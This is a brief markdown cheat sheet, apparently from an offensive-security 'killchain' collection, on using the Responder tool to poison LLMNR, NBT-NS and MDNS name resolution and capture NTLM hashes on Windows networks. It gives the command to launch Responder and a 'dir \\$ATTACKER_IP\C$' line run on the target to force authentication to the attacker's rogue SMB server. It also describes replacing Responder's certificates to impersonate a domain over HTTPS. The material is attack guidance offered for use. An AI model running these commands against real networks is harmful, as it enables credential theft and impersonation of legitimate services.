killchain-compendium/Exploits/Windows/Responder.md

Responder

• lgandx's repo

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication

Usage

Grab NTLM Token

• Setup responder

responder -I tun0 -wrvd

• Open an Shell on the windows target and request the attacker's SMB a.k.a responder

dir \\$ATTACKER_IP\C$

Impersonate Domain -- Change Responder's certificates

• After using nsupdate to add the attacker as a subdomain do the following tasks
• Add a certificate and its private key to

/usr/share/responder/certs

• Edit Responder.conf

[HTTPS Server]

; Configure SSL Certificates to use
SSLCert = certs/cert.pem
SSLKey = certs/key.pem

• Start responder

responder -I <interface>